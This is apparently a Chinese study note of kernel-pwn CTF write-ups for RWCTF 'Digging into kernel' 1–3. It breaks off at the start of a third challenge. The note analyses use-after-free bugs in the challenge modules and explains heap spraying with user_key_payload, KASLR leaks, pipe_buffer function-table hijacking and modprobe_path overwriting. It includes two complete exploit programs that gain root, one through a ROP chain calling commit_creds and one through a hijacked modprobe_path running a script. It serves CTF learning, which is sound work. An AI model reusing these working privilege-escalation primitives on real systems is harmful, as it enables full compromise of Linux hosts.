kernel学习笔记2

RWCTF2023 体验赛 - Digging into kernel 3

分析

首先看启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
   1   │ #!/bin/sh
2 │
3 │ qemu-system-x86_64 \
4 │ -m 128M \
5 │ -nographic \
6 │ -kernel ./bzImage \
7 │ -initrd ./rootfs.img \
8 │ -cpu kvm64,+smap,+smep \
9 │ -monitor /dev/null \
10 │ -append 'console=ttyS0 kaslr kpti=1 quiet oops=panic panic=1 init=/init' \
11 │ -no-reboot \
12 │ -snapshot \
13 │ -s
14 │
15 │ #-enable-kvm \
───────┴────────────────────────────────────────

可以看到开启了smap,smep,kaslr,kpri等保护

再看init脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1   │ #!/bin/sh
2 │
3 │ mkdir /tmp
4 │ mount -t proc none /proc
5 │ mount -t sysfs none /sys
6 │ mount -t devtmpfs none /dev
7 │ mount -t tmpfs none /tmp
8 │
9 │ exec 0</dev/console
10 │ exec 1>/dev/console
11 │ exec 2>/dev/console
12 │
13 │ insmod /rwctf.ko
14 │ chmod 666 /dev/rwctf
15 │ chmod 700 /flag
16 │ chmod 400 /proc/kallsyms
17 │
18 │ echo 1 > /proc/sys/kernel/kptr_restrict
19 │ echo 1 > /proc/sys/kernel/dmesg_restrict
20 │
21 │ poweroff -d 120 -f &
22 │
23 │ echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
24 │ setsid /bin/cttyhack setuidgid 1000 /bin/sh
25 │
26 │ umount /proc
27 │ umount /sys
28 │ umount /tmp
29 │
30 │ poweroff -d 0 -f

kptr_restrict参数控制是否对非特权用户隐藏内核符号地址的显示。

dmesg_restrict参数控制非特权用户对内核日志dmesg的访问权限。

为1就是非特权用户无权访问

那么主要就是利用rwctf.ko这个模块了

ida打开分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
__int64 rwmod_init()
{
unsigned int v0; // r12d

v0 = -1;
cdev = 255;
qword_7A8 = (__int64)"rwctf";
qword_7B0 = (__int64)&file_ops;
if ( !(unsigned int)misc_register(&cdev) )
{
v0 = 0;
printk(&unk_1B9);
}
return v0;
}

misc_register() 函数用于注册杂项字符设备

注册的函数真正有用的函数便只有ioctl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
__int64 __fastcall rwmod_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 v3; // r12
__int64 v5; // rbx
__int64 v6; // rdi
unsigned int v7; // [rsp+0h] [rbp-30h] BYREF
unsigned int v8; // [rsp+4h] [rbp-2Ch]
__int64 v9; // [rsp+8h] [rbp-28h]
unsigned __int64 v10; // [rsp+18h] [rbp-18h]

v10 = __readgsqword(0x28u);
if ( !a3 )
return -1LL;
if ( a2 == 0xC0DECAFE )
{
if ( !copy_from_user(&v7, a3, 16LL) && v7 <= 1 )
kfree(buf[v7]);
return 0LL;
}
v3 = -1LL;
if ( a2 == 0xDEADBEEF )
{
if ( copy_from_user(&v7, a3, 16LL) )
return 0LL;
v5 = v7;
if ( v7 > 1 )
return 0LL;
buf[v5] = _kmalloc(v8, 3520LL);
v6 = buf[v7];
if ( !v6 )
return 0LL;
if ( v8 > 2147483647uLL )
BUG();
if ( copy_from_user(v6, v9, v8) )
return 0LL;
}
return v3;
}

可以看到有明显的uaf漏洞,此外申请内存时最多只能同时控制两个obj

且必须申请后才能使用,这点倒是内核模块中似乎都如此

解法1

这个解法是ctf-wiki为了讲解heap-spray特意选用的一种方法,为了讲解这一技巧可能选用了不那么直接的方法

核心思路是通过uaf改大user_key_payload的datalen字段,以此做到溢出并泄露内核基址,并再次通过uaf写pipe管道的函数表字段从而完成最终利用

为了方便利用需要将decription长度和payload的长度区分开,以此简化利用模型,只需要考虑payload的两个obj

add_key() 会先分配一个临时的 obj1 拷贝 payload 后再分配一个 obj2 作为 user_key_payload,若我们先分配一个 obj 并释放后再调用 add_key() 则该 obj 不会直接成为 user_key_payload ,而是会在后续的数次分配中都作为拷贝 payload 的临时 obj 存在。

另一个显然的办法是程序提供了两个obj的管理,那就使用这两个指针来uaf,但这里wiki为了展示堆喷这一技巧选择就用一个指针来完成

此外个人的一个想法是能不能使得obj1与obj2位于两个kmem_cache分配器中,其中关键的user_key_payload位于192,临时obj1则位于128,有时间可以试试

但我们可以通过堆喷将 UAF obj 分配到 user_key_payload,考虑如下流程:

  • 利用题目功能构建 UAF object。
  • 堆喷射 user_key_payload ,UAF obj 作为拷贝 payload 的临时 obj 存在。
  • kmem_cache_cpu 的 slub page 耗光,向 node 请求新的 slub page 分配 user_key_payload ,完成后 UAF obj 被释放并回到 kmem_cache_node
  • 继续堆喷 user_key_payloadkmem_cache_cpu 的 slub page 耗光,向 node 请求新的 slub page 分配 user_key_payload
  • UAF obj 所在页面被取回,UAF obj 被分配为 user_key_payload
  • 利用题目功能再次释放 UAF obj,利用题目功能进行堆喷获取到该 obj,从而覆写 user_key_payload

可能有点难理解,简单来说就是每次add_key会使用两个obj,第一个是临时obj最终会释放,而我们的目标是uaf第二个user_key_payload,

每次add_key实际上slab减少一个obj,因此在耗尽第一个slab之前显然每次我们uaf控制的都是临时obj,但在第一个slab仅剩一个obj时,这个obj被用来做第一个临时obj,而去一个新的slab获取第二个obj用作user_key_payload,那么在这次add_key结束后,第一个obj又被释放,那么在第二个slab仅剩一个obj时,再来一次add_key就会使我们能够uaf的obj作为user_key_payload

接下来我们考虑越界读取什么数据,这里我们并不需要分配其他的结构体, rcu_head->func 函数指针在 rcu 对象被释放后才会被写入并调用,但调用完并不会将其置为 NULL,因此我们可以通过释放密钥的方式在内核堆上留下内核函数指针,从而完成内核基址的泄露。即通过key_read泄露slab页中残余的函数指针

可以用来控制内核执行流的结构体有很多,但是我们需要考虑如何完整地执行 commit_creds(prepare_kernel_cred(NULL)) 后再成功返回用户态,因此我们需要进行栈迁移以布置较为完整的 ROP gadget chain。

由于题目开启了 SMEP、SMAP 保护,因此我们只能在内核空间伪造函数表,同时内核中的大部分结构体的函数表为静态指定(例如 tty->ops 总是 ptm(或pty)_unix98_ops),因此我们还需要知道一个内容可控的内核对象的地址,从而在内核空间中伪造函数表。

wiki选择管道相关的结构体完成利用;在内核中,管道本质上是创建了一个虚拟的 inode 来表示的,对应的就是一个 pipe_inode_info 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};//该结构体使用kmalloc-192分配

可以看到其中有一个bufs指针指向一个struct pipe_buffer,每个 pipe_buffer 结构体对应一张用以存储数据的内存页,虽然这个结构体不大,但是slab分配时会分配1024大小的obj

1
2
3
4
5
6
7
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

pipe_buf_operations 为一张函数表,当我们对管道进行特定操作时内核便会调用该表上对应的函数,例如当我们关闭了管道的两端时,会触发 pipe_buffer->pipe_buffer_operations->release 这一指针,由此我们便能控制内核执行流,从而完成提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->steal() returns 0 for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned
* by the caller. The page may then be transferred to a different
* mapping, the most often used case is insertion into different
* file address space cache.
*/
int (*steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

那么这里我们可以利用 UAF 使得 user_key_payloadpipe_inode_info 占据同一个 object, pipe_inode_info 刚好会将 user_key_payload->datalen 改为 0xFFFF (这个字段应该是一个指针,至于为什么会是ffff不太清除使得我们能够继续读取数据,为了能够泄露数据肯定是个先用其uaf user_key_payload再uafpipe_inode_info,从而读取 pipe_inode_info泄露出 pipe_buffer 的地址。

pipe_buffer 是动态分配的,因此我们可以利用题目功能预先分配一个对象作为 pipe_buffer 并直接uaf在其上伪造函数表即可。

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <stdio.h>
#include <signal.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <ctype.h>
#include <stdint.h>
#include "kernelpwn.h"

/* kmalloc-192 has only 21 objects on a slub, we don't need to spray to many */
#define KEY_SPRAY_NUM 40

#define PIPE_INODE_INFO_SZ 192
#define PIPE_BUFFER_SZ 1024

#define USER_FREE_PAYLOAD_RCU 0xffffffff813d8210
#define PREPARE_KERNEL_CRED 0xffffffff81096110
#define COMMIT_CREDS 0xffffffff81095c30
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81e00ed0

#define PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250c9d
#define POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250ca4
#define POP_RDI_RET 0xffffffff8106ab4d
#define XCHG_RDI_RAX_DEC_STH_RET 0xffffffff81adfc70

int dev_fd;

struct node {
uint32_t idx;
uint32_t size;
void *buf;
};

/**
* @brief allocate an object bby kmalloc(size, __GFP_ZERO | GFP_KERNEL )
* __GFP_RECLAIM = __GFP_KSWAPD_RECLAIM | __GFP_DIRECT_RECLAIM
* GFP_KERNEL = __GFP_RECLAIM | __GFP_IO | __GFP_FS
*
* @param idx
* @param size
* @param buf
*/
void alloc(uint32_t idx, uint32_t size, void *buf)
{
struct node n = {
.idx = idx,
.size = size,
.buf = buf,
};

ioctl(dev_fd, 0xDEADBEEF, &n);
}

void del(uint32_t idx)
{
struct node n = {
.idx = idx,
};

ioctl(dev_fd, 0xC0DECAFE, &n);
}

int main(int argc, char **argv, char **envp)
{
size_t *buf, pipe_buffer_addr;
int key_id[KEY_SPRAY_NUM], victim_key_idx = -1, pipe_key_id;
char desciption[0x100];
int pipe_fd[2];
int retval;

/* fundamental works */
bindCore(0);
saveStatus();

buf = malloc(sizeof(size_t) * 0x4000);

dev_fd = open("/dev/rwctf", O_RDONLY);
if (dev_fd < 0) {
errExit("FAILED to open the /dev/rwctf file!");
}

/* construct UAF on user_key_payload */
puts("[*] construct UAF obj and spray keys...");
alloc(0, PIPE_INODE_INFO_SZ, buf);
del(0);

for (int i = 0; i < KEY_SPRAY_NUM; i++) {//KEY_SPRAY_NUM不一定非得是40,只要能使得耗尽两个slab即可
snprintf(desciption, 0x100, "%s%d", "arttnba", i);
key_id[i] = key_alloc(desciption, buf, PIPE_INODE_INFO_SZ - 0x18);
if (key_id[i] < 0) {
printf("[x] failed to alloc %d key!\n", i);
errExit("FAILED to add_key()!");
}
}

del(0);//uaf

/* corrupt user_key_payload's header */
puts("[*] corrupting user_key_payload...");

buf[0] = 0;
buf[1] = 0;
buf[2] = 0x2000;

for (int i = 0; i < (KEY_SPRAY_NUM * 2); i++) {
alloc(0, PIPE_INODE_INFO_SZ, buf);//不太清楚为什么要循环这么多次,按照道理LIFO,第一个就应该是刚才del的0啊
}

/* check for oob-read and leak kernel base */
puts("[*] try to make an OOB-read...");

for (int i = 0; i < KEY_SPRAY_NUM; i++) {
if (key_read(key_id[i], buf, 0x4000) > PIPE_INODE_INFO_SZ) {
printf("[+] found victim key at idx: %d\n", i);
victim_key_idx = i;
} else {
key_revoke(key_id[i]);
}//如果读了超过192个字符,那么就说明其是victim,否则的话将其销毁置函数指针
}

if (victim_key_idx == -1) {
errExit("FAILED at corrupt user_key_payload!");
}

kernel_offset = -1;
for (int i = 0; i < 0x2000 / 8; i++) {
if (buf[i] > kernel_base && (buf[i] & 0xfff) == 0x210) {
kernel_offset = buf[i] - USER_FREE_PAYLOAD_RCU;
kernel_base += kernel_offset;
break;
}//在读出来的内容中,挨个判断是否大于kernel_base并且以0x210结尾,是的话就基本确定其是所要的函数指针了,又一个疑问,这里其实有一定概率读出来的内容中并不存在函数指针的,例如目标obj位于slab的最后位置,而且就算确定有,那也是先读再销毁产生函数指针,靠Random freelist???
}

if (kernel_offset == -1) {
errExit("FAILED to leak kernel addr!");
}

printf("\033[34m\033[1m[*] Kernel offset: \033[0m0x%lx\n", kernel_offset);
printf("\033[32m\033[1m[+] Kernel base: \033[0m0x%lx\n", kernel_base);

/* construct UAF on pipe_inode_buffer to leak pipe_buffer's addr */
puts("[*] construct UAF on pipe_inode_info...");

/* 0->1->..., the 1 will be the payload object */
alloc(0, PIPE_INODE_INFO_SZ, buf);
alloc(1, PIPE_INODE_INFO_SZ, buf);
del(1);
del(0);

pipe_key_id = key_alloc("arttnba3pipe", buf, PIPE_INODE_INFO_SZ - 0x18);
del(1);

/* this object is for the pipe buffer */
alloc(0, PIPE_BUFFER_SZ, buf);
del(0);

pipe(pipe_fd);//uaf PIPE_INODE_INFO and key_user_payload

/* note that the user_key_payload->datalen is 0xFFFF now */
retval = key_read(pipe_key_id, buf, 0xffff);
pipe_buffer_addr = buf[16]; /* pipe_inode_info->bufs得到pipe_buffer的地址 *//
printf("\033[32m\033[1m[+] Got pipe_buffer: \033[0m0x%lx\n",
pipe_buffer_addr);

/* construct fake pipe_buf_operations */
memset(buf, 'A', sizeof(buf));

buf[0] = *(size_t*) "arttnba3";
buf[1] = *(size_t*) "arttnba3";
buf[2] = pipe_buffer_addr + 0x18; /* pipe_buffer->ops,是函数指针表指向buffer内部 */
/* after release(), we got back here */
buf[3] = kernel_offset + POP_RBX_POP_RBP_POP_R12_RET;
/* pipe_buf_operations->release */
buf[4] = kernel_offset + PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET;//函数指针调用时第二个参数rsi就是buffer,所以之后才会又回到buf[3]
buf[5] = *(size_t*) "arttnba3";
buf[6] = *(size_t*) "arttnba3";
buf[7] = kernel_offset + POP_RDI_RET;
buf[8] = NULL;
buf[9] = kernel_offset + PREPARE_KERNEL_CRED;
buf[10] = kernel_offset + XCHG_RDI_RAX_DEC_STH_RET;
buf[11] = kernel_offset + COMMIT_CREDS;
buf[12] = kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 0x31;
buf[13] = *(size_t*) "arttnba3";
buf[14] = *(size_t*) "arttnba3";
buf[15] = getRootShell;
buf[16] = user_cs;
buf[17] = user_rflags;
buf[18] = user_sp + 8; /* system() wants it : ( */
buf[19] = user_ss;

del(0);
alloc(0, PIPE_BUFFER_SZ, buf);//uaf pipe_buffer

/* trigger pipe_buf_operations->release */
puts("[*] trigerring pipe_buf_operations->release()...");

close(pipe_fd[1]);
close(pipe_fd[0]);

return 0;
}

kernel密钥管理接口

在linux内核中有一套专门用于管理密钥的子系统,负责密钥的创建,读取,更新以及销毁等功能

内核提供了两个系统调用来负责这些操作

add_key()keyctl()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
        #include <sys/types.h>
#include <keyutils.h>

key_serial_t add_key(const char *type, const char *description,
const void *payload, size_t plen,
key_serial_t keyring);
//...
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>

long syscall(__NR_keyctl, int operation, __kernel_ulong_t arg2,
__kernel_ulong_t arg3, __kernel_ulong_t arg4,
__kernel_ulong_t arg5);

当调用add_key()创建带有 description 字符串的、类型为 "user" 的、长度为 plen 的内容为 payload 的密钥时

  • 首先会在内核空间中分配 obj 1 与 obj2,分配 flag 为 GFP_KERNEL,用以保存 description (字符串,最大大小为 4096)、payload (普通数据,大小无限制)
  • 分配 obj3 保存 description ,分配 obj4 保存 payload,分配 flag 皆为 GFP_KERNEL
  • 释放 obj1 与 obj2,返回密钥 id

其中 obj4 为一个 user_key_payload 结构体,定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

//...

struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

由于decription和payload的长度都是可控的,那么obj1-4的大小其实也是可控的

类似于 msg_msguser_key_payload 结构体有着一个固定大小的头部,其余空间用来存储来自用户空间的数据(密钥内容)。

keyctl() 系统调用为我们提供了读取、更新(分配新对象,释放旧对象)、销毁密钥(释放 payload)的功能,其中读取的最大长度由 user_key_payload->datalen 决定

读取 key 时的 len 应当不小于 user_key_payload->datalen,否则会读取失败,但是可以大于datalen。

当释放一个密钥时

内核中,对应的处理流程是_x64_sys_keyctl() -> keyctl_revoke_key() -> key_revoke() -> user_revoke() -> call_rcu(),在call_rcu()函数中将 user_key_payload 结构体的 rcu.func 设置成user_free_payload_rcu()函数的地址

解法2

解法3

RWCTF2022 高校赛 - Digging into kernel 1 & 2

分析

启动脚本

1
2
3
4
5
6
7
qemu-system-x86_64 \
-kernel bzImage \
-initrd rootfs.cpio \
-append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet kalsr" \
-cpu kvm64,+smep,+smap \
-monitor null \
--nographic

开启了smap,smep

又可以发现开启了kpti

1
2
3
4
5
6
7
8
9
cat /sys/devices/system/cpu/vulnerabilities/*
Processor vulnerable
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected

这个题目给的cpio中并没有init脚本

不过可以发现 xkmod.ko ,按照惯例这应当就是有漏洞的 LKM,拖入 IDA 进行分析。

在模块载入时会新建一个 kmem_cache 叫 "lalala",对应 object 大小是 192,这里我们注意到后面三个参数都是 0 ,对应的是 align(对齐),flags(标志位),ctor(构造函数),由于没有设置 SLAB_ACCOUNT 标志位故该 kmem_cache 会默认与 kmalloc-192 合并

1
2
3
4
5
6
7
8
9
10
11
int __cdecl xkmod_init()
{
kmem_cache *v0; // rax

printk(&unk_1E4);
misc_register(&xkmod_device);
v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
buf = 0LL;
s = v0;
return 0;
}

其他的主要就是实现了ioctl,以及在关闭文件时会释放object

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 v3; // [rsp+0h] [rbp-20h] BYREF
unsigned int v4; // [rsp+8h] [rbp-18h]
unsigned int v5; // [rsp+Ch] [rbp-14h]
unsigned __int64 v6; // [rsp+10h] [rbp-10h]

v6 = __readgsqword(0x28u);
if ( a3 )
{
copy_from_user(&v3, a3, 16LL);
if ( a2 == 107374182 )
{
if ( buf && v5 <= 0x50 && v4 <= 0x70 )
{
copy_from_user((char *)buf + (int)v4, v3, (int)v5);
return;
}
}
else
{
if ( a2 != 125269879 )
{
if ( a2 == 17895697 )
buf = (void *)kmem_cache_alloc(s, 3264LL);
return;
}
if ( buf && v5 <= 0x50 && v4 <= 0x70 )
{
copy_to_user(v3, (char *)buf + (int)v4);
return;
}
}
xkmod_ioctl_cold();
}
}

这里的 buf 是一个全局指针,我们可以注意到 ioctl 中所有的操作都没有上锁

漏洞点主要在关闭设备文件时会释放掉 buf,但是没有将 buf 指针置 NULL,只要我们同时打开多个设备文件便能完成 UAF

需要的结构体如下

1
2
3
4
5
6
struct Data
{
size_t *ptr;
unsigned int offset;
unsigned int length;
}data;

漏洞利用

任意地址读写

首先因为uaf的存在,我们能够泄露一个object释放之后的内容

而kmem_cache的offset成员,决定了一个obj释放后的next指针位置

这里经过测试可以前八个字节就是一个内核地址,但是每次的页内偏移不同

由此可以知道

  1. offset==0
  2. 开启了RANDOM_FREELIST 保护
  3. 没有开启HARDENED_FREELIST保护

freelist 随机化保护并非是一个运行时保护,而是在为 slub 分配页面时会将页面内的 object 指针随机打乱,但是在后面的分配释放中依然遵循着后进先出的原则,因此我们可以先获得一个 object 的 UAF,修改其 next 为我们想要分配的地址,之后我们连续进行两次分配便能够成功获得目标地址上的 object ,实现任意地址读写

但这么做有着一个小问题,当我们分配到目标地址时目标地址前 8 字节的数据会被写入 freelist,而这通常并非一个有效的地址,从而导致 kernel panic,因此我们应当尽量选取目标地址往前的一个有着 8 字节 0 的区域,从而使得 freelist 获得一个 NULL 指针,促使 kmem_cache 向 buddy system 请求一个新的 slub,这样就不会发生 crash。

泄露基址

接下来我们考虑如何泄露内核基址,虽然题目新建的 kmem_cache 会默认与 kmalloc-192 合并,但为了还原出题人原始意图,我们还是将其当作一个独立的 kmem_cache 来完成利用。

在内核 “堆基址”(page_offset_base) + 0x9d000 处存放着 secondary_startup_64(0xffffffff81000030) 函数的地址,而我们可以从 free object 的 next 指针获得一个堆上地址,从而去猜测堆的基址,之后分配到一个 堆基址 + 0x9d000 处的 object 以泄露内核基址,这个地址前面刚好有一片为 NULL 的区域方便我们分配。

若是没有猜中,笔者认为直接重试即可,但这里需要注意的是我们不能够直接退出,而应当保留原进程的文件描述符打开,否则会在退出进程时触发 slub 的 double free 检测,不过经笔者测验大部分情况下都能够猜中堆基址。

修改modprobe_path以root执行程序

接下来我们考虑如何通过任意地址写完成利用,比较常规的做法是覆写内核中的一些全局的可写的函数表(例如 n_tty_ops)来劫持内核执行流,这里选择覆写 modprobe_path 从而以 root 执行程序。

当我们尝试去执行(execve)一个非法的文件(file magic not found,即文件格式头错误),内核会经历如下调用链:

1
2
3
4
5
6
7
8
9
entry_SYSCALL_64()
sys_execve()
do_execve()
do_execveat_common()
bprm_execve()
exec_binprm()
search_binary_handler()
__request_module() // wrapped as request_module
call_modprobe()

其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码(以下来着内核源码 5.14):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static int call_modprobe(char *module_name, int wait)
{
//...
argv[0] = modprobe_path;//argv[0]即运行程序名
argv[1] = "-q";
argv[2] = "--";
argv[3] = module_name; /* check free_modprobe_argv() */
argv[4] = NULL;

info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
NULL, free_modprobe_argv, NULL);
if (!info)
goto free_module_name;

return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
//...

在这里调用了函数 call_usermodehelper_exec()modprobe_path 作为可执行文件路径以 root 权限将其执行,这个地址上默认存储的值为/sbin/modprobe

我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本

modprobe_path的地址可以由符号名直接搜索到

但是有些vmlinux似乎去除了这个符号

这个时候就可以通过搜索modprobe_path的初始符号值/sbin/modprobe寻找

例如本题最终底下那个就是modprobe的地址,最顶上那个对应直接映射区

又或者在/proc/kallsyms文件夹下找

grep modprobe_path /proc/kallsyms

exp

流程就是利用uaf写一个obj的next指针

首先泄露page_offset_base进而再次泄露page_offset_base+0x9d000处的内核函数指针

从而得到内核映射基址

然后uaf写modprobe_path为创建的利用程序路径

最后打开一个非法文件触发利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>

#define MODPROBE_PATH 0xffffffff82444700

struct Data
{
size_t *ptr;
unsigned int offset;
unsigned int length;
};

#define ROOT_SCRIPT_PATH "/home/getshell"
char root_cmd[] = "#!/bin/sh\nchmod 777 /flag";

/* bind the process to specific core */
void bindCore(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

void errExit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
exit(EXIT_FAILURE);
}

void allocBuf(int dev_fd, struct Data *data)
{
ioctl(dev_fd, 0x1111111, data);
}

void editBuf(int dev_fd, struct Data *data)
{
ioctl(dev_fd, 0x6666666, data);
}

void readBuf(int dev_fd, struct Data *data)
{
ioctl(dev_fd, 0x7777777, data);
}

int main(int argc, char **argv, char **envp)
{
int dev_fd[5], root_script_fd, flag_fd;
size_t kernel_heap_leak, kernel_text_leak;
size_t kernel_base, kernel_offset, page_offset_base;
char flag[0x100];
struct Data data;

/* fundamental works */
bindCore(0);

for (int i = 0; i < 5; i++) {
dev_fd[i] = open("/dev/xkmod", O_RDONLY);
}

/* create fake modprobe_path file */
root_script_fd = open(ROOT_SCRIPT_PATH, O_RDWR | O_CREAT);
write(root_script_fd, root_cmd, sizeof(root_cmd));
close(root_script_fd);
system("chmod +x " ROOT_SCRIPT_PATH);

/* construct UAF */
data.ptr = malloc(0x1000);
data.offset = 0;
data.length = 0x50;
memset(data.ptr, 0, 0x1000);

allocBuf(dev_fd[0], &data);
editBuf(dev_fd[0], &data);
close(dev_fd[0]);

/* leak kernel heap addr and guess the page_offset_base */
readBuf(dev_fd[1], &data);
kernel_heap_leak = data.ptr[0];
page_offset_base = kernel_heap_leak & 0xfffffffff0000000;//直接映射区的后28位一般是0

printf("[+] kernel heap leak: 0x%lx\n", kernel_heap_leak);
printf("[!] GUESSING page_offset_base: 0x%lx\n", page_offset_base);

/* try to alloc fake chunk at (page_offset_base + 0x9d000 - 0x10) */
puts("[*] leaking kernel base...");

data.ptr[0] = page_offset_base + 0x9d000 - 0x10;
data.offset = 0;
data.length = 8;

editBuf(dev_fd[1], &data);
allocBuf(dev_fd[1], &data);
allocBuf(dev_fd[1], &data);

data.length = 0x40;
readBuf(dev_fd[1], &data);
if ((data.ptr[2] & 0xfff) != 0x30) {
printf("[!] invalid data leak: 0x%lx\n", data.ptr[2]);
errExit("\033[31m\033[1m[x] FAILED TO HIT page_offset_base! TRY AGAIN!");
}

kernel_base = data.ptr[2] - 0x30;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] kernel base:\033[0m 0x%lx\n", kernel_base);
printf("\033[32m\033[1m[+] kernel offset:\033[0m 0x%lx\n", kernel_offset);

/* hijack the modprobe_path, we'll let it requesting new slub page for it */
puts("[*] hijacking modprobe_path...");

allocBuf(dev_fd[1], &data);
close(dev_fd[1]);

data.ptr[0] = kernel_offset + MODPROBE_PATH - 0x10;
data.offset = 0;
data.length = 0x8;

editBuf(dev_fd[2], &data);
allocBuf(dev_fd[2], &data);
allocBuf(dev_fd[2], &data);

strcpy((char *) &data.ptr[2], ROOT_SCRIPT_PATH);
data.length = 0x30;
editBuf(dev_fd[2], &data);

/* trigger the fake modprobe_path */
puts("[*] trigerring fake modprobe_path...");

system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
system("chmod +x /home/fake");
system("/home/fake");

/* read flag */
memset(flag, 0, sizeof(flag));

flag_fd = open("/flag", O_RDWR);
if (flag_fd < 0) {
errExit("failed to chmod flag!");
}

read(flag_fd, flag, sizeof(flag));
printf("\033[32m\033[1m[+] Got flag: \033[0m%s\n", flag);

return 0;
}

qwb2021-notebook

启动脚本

1
2
3
#!/bin/sh
stty intr ^]
